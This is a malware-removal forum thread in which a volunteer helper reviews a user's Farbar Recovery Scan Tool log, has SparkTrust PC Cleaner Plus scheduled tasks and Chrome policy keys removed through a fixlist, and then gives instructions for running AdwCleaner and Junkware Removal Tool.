Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser) (HKLM-x32\...\{B2D55EB8-32C5-4B43-9006-9E97DECBA178}) (Version: 1.00.0000 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{03B8AA32-F23C-4178-B8E6-09ECD07EAA47}) (Version: 2.40.0001 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON TX420 NX420 Series Manual (HKLM-x32\...\EPSON TX420 NX420 Series Manual) (Version:  - )
EPSON TX420 NX420 Series Network Guide (HKLM-x32\...\EPSON TX420 NX420 Series Network Guide) (Version:  - )
EPSON TX420 NX420 Series Printer Uninstall (HKLM\...\EPSON TX420 NX420 Series) (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.4j - SEIKO EPSON CORPORATION)
EpsonNet Setup 3.2 (HKLM-x32\...\{C9D8A041-2963-4B31-8FFC-1500F3DB9293}) (Version: 3.2a - SEIKO EPSON CORPORATION)
Google Chrome (HKLM-x32\...\{E1AA8B0F-1176-36F1-8A91-AA19CF39C2F6}) (Version: 65.169.76 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5247.34 - PC-Doctor, Inc.)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.9512.3162 - Hewlett-Packard)
HP Customer Experience Enhancements (x32 Version: 6.0.1.3 - Hewlett-Packard) Hidden
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{17B4760F-334B-475D-829F-1A3E94A6A4E6}) (Version: 1.2.3560.3170 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{741CFE3A-1C0B-4A7D-8E08-5D78C911C09D}) (Version: 4.2.5.3 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
HPAsset component for HP Active Support Library (x32 Version: 3.0.2.2 - Hewlett-Packard) Hidden
HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) Hidden
iTunes (HKLM\...\{D601CEAD-2E4F-4BBB-85CC-C29A4CE6A3C0}) (Version: 11.1.3.8 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2017 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2017 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{10CCF16B-F1C9-4B24-9570-B4CCEE42392D}) (Version: 1.18.9.1 - LightScribe)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Media Player (HKLM-x32\...\MediaPlayerV1alpha8359) (Version: 1.1 - Media Player)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 27.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0.1 (x86 en-US)) (Version: 27.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0.1 - Mozilla)
Mozilla Thunderbird 24.2.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 24.2.0 (x86 en-US)) (Version: 24.2.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.6 - NVIDIA Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3304 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3304 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3503 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3503 - CyberLink Corp.) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5938 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.2216 - CyberLink Corp.) Hidden
SparkTrust PC Cleaner Plus (HKLM-x32\...\{35827710-D042-428B-A1E5-E20E12D2FEB9}) (Version: 3.2.0.0 - SparkTrust) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Restore Points  =========================

09-02-2014 23:03:51 Windows Update
12-02-2014 10:43:35 Windows Update
19-02-2014 05:23:30 Windows Update
20-02-2014 08:31:58 Advanced System Protector
09-03-2014 03:25:28 Installed AVG PC TuneUp 2014
13-03-2014 03:29:43 Windows Update
15-03-2014 23:04:57 avast! antivirus system restore point
16-03-2014 05:18:10 avast! antivirus system restore point
17-03-2014 01:36:55 SparkTrust PC Cleaner Plus Backup

==================== Hosts content: ==========================

2009-07-14 12:34 - 2009-06-11 07:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {008BA38B-708F-4856-AFD5-7903F65F6B35} - \LaunchApp No Task File
Task: {1D3D8FAB-691B-4E12-95B7-A6B89E2172FE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-13] (Adobe Systems Incorporated)
Task: {21FEC08F-0231-46F0-A7D0-AFED6D89946A} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {24520CCF-5ED8-45E5-9F85-2B5A176C46F0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2014-02-25] (Microsoft)
Task: {2DDDE1F6-6A01-406E-B04F-5AB986DEED07} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-03-16] (AVAST Software)
Task: {34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {4D9EAB9D-63CF-4A88-92AE-529E6484106C} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2013-12-21] (Adobe Systems Incorporated)
Task: {63978307-3802-494C-A321-62E7B6BE06EA} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2013-12-18] (AVG)
Task: {6BBD3D21-9BF1-4882-9864-9172C5466808} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {6D5E47A5-6D2D-4179-B59F-01F947F47E2C} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18] (PC-Doctor, Inc.)
Task: {746113CB-426A-4600-9D70-1890814BADF2} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {79451F9F-BD6F-4B1B-9511-0149DB1BAFCF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20] (Google Inc.)
Task: {7C387643-180A-43F2-861B-7C3746BB7FAB} - System32\Tasks\SparkTrust Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {7F93F3ED-0287-4003-AA4B-6033D187366B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {8C8404EC-CEA0-42C9-9BB6-69E9F18A6F6A} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9FAA8F16-BAE0-4F90-8A53-8E53D60C3568} - \Advanced System Protector No Task File
Task: {A6621C5E-7718-4FEC-BB07-0C84B254A5EE} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} - System32\Tasks\SparkTrust Update Version3 => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {CCFE2010-CEF9-4EA7-9783-89694F76AB4B} - System32\Tasks\RMCreator => C:\Program Files (x86)\Hewlett-Packard\Recovery\Reminder.exe [2009-10-16] (CyberLink)
Task: {E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} - System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: {EB356D5C-DDFD-450E-90DD-1AE28608363C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20] (Google Inc.)
Task: {FD21BDEB-CC13-43B0-825A-79A92040584E} - \Advanced System Protector_startup No Task File
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdrcui.exe
Task: C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION

==================== Loaded Modules (whitelisted) =============

2014-01-20 19:43 - 2013-10-23 15:24 - 00087600 _____ () C:\Windows\System32\cpwmon64.dll
2013-12-18 09:38 - 2013-12-18 09:38 - 00742200 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\avgrepliba.dll
2009-06-26 10:25 - 2009-06-26 10:25 - 00098304 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-01-24 06:26 - 2010-01-24 06:26 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2014-03-18 23:33 - 2014-03-18 21:03 - 02188800 _____ () C:\Program Files\AVAST Software\Avast\defs\14031801\algo.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-16 09:06 - 2014-03-16 09:06 - 19336120 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll

==================== Alternate Data Streams (whitelisted) =========

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupreg: HP Remote Solution => %ProgramFiles%\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
MSCONFIG\startupreg: HP Software Update => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: HPADVISOR => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe autorun=AUTORUN
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: PC-Doctor for Windows localizer => C:\Program Files\PC-Doctor for Windows\localizer.exe
MSCONFIG\startupreg: RESTART_STICKY_NOTES => C:\Windows\System32\StikyNot.exe

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================

System errors:
=============

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Percentage of memory in use: 69%
Total physical RAM: 2047.3 MB
Available physical RAM: 630.77 MB
Total Pagefile: 4094.61 MB
Available Pagefile: 2039.21 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (COMPAQ) (Fixed) (Total:688.58 GB) (Free:607.13 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:9.95 GB) (Free:1.47 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 699 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=689 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 19 March 2014 - 07:41 AM

Hello Paulie67



I need you to download this script I have made for you --> Attached File  fixlist.txt   2.52KB   5 downloads

It needs to be saved Next to the "Farbar Recovery Scan Tool" (FRST) program (If asked to overwrite existing one please allow)

Run FRST again but this time press the Fix button just once and wait.


When finished, it will make a log (fixlog.txt) next to FRST. Please copy and paste the content of this file to your reply.


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system


Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#5 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 19 March 2014 - 05:13 PM


Hello Gringo,








Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-03-2014
Ran by Paulette at 2014-03-20 07:58:01 Run:1
Running from C:\Users\Paulette\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
2014-03-17 11:13 - 2014-03-17 11:40 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-19 00:23 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
Task: {34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {7C387643-180A-43F2-861B-7C3746BB7FAB} - System32\Tasks\SparkTrust Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} - System32\Tasks\SparkTrust Update Version3 => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} - System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION

*****************

HKLM\SOFTWARE\Policies\Google => Key deleted successfully.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
C:\Windows\Tasks\SparkTrust Registration3.job => Moved successfully.
C:\Windows\System32\Tasks\SparkTrust Registration3 => Moved successfully.
C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => Moved successfully.
"C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job" => File/Directory not found.
C:\Windows\Tasks\SparkTrust Update Version3.job => Moved successfully.
"C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E" => File/Directory not found.
C:\Windows\System32\Tasks\SparkTrust Update Version3 => Moved successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Registration3 not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Registration3 => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7C387643-180A-43F2-861B-7C3746BB7FAB} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7C387643-180A-43F2-861B-7C3746BB7FAB} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Update Version3 Startup Task => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Update Version3 => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} => Key not found.
C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => Key not found.
C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job not found.
C:\Windows\Tasks\SparkTrust Registration3.job not found.
C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job not found.
C:\Windows\Tasks\SparkTrust Update Version3.job not found.


The system needed a reboot.

==== End of Fixlog ====

#6 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 19 March 2014 - 05:57 PM



Hello Paulie67

Now lets rerun these

These are the programs I would like you to run next, if you have any problems with one of these just skip it and move on to the next one.

-AdwCleaner-

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
-Junkware-Removal-Tool-

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
When they are complete let me have the two reports and let me know how things are running.

Gringo
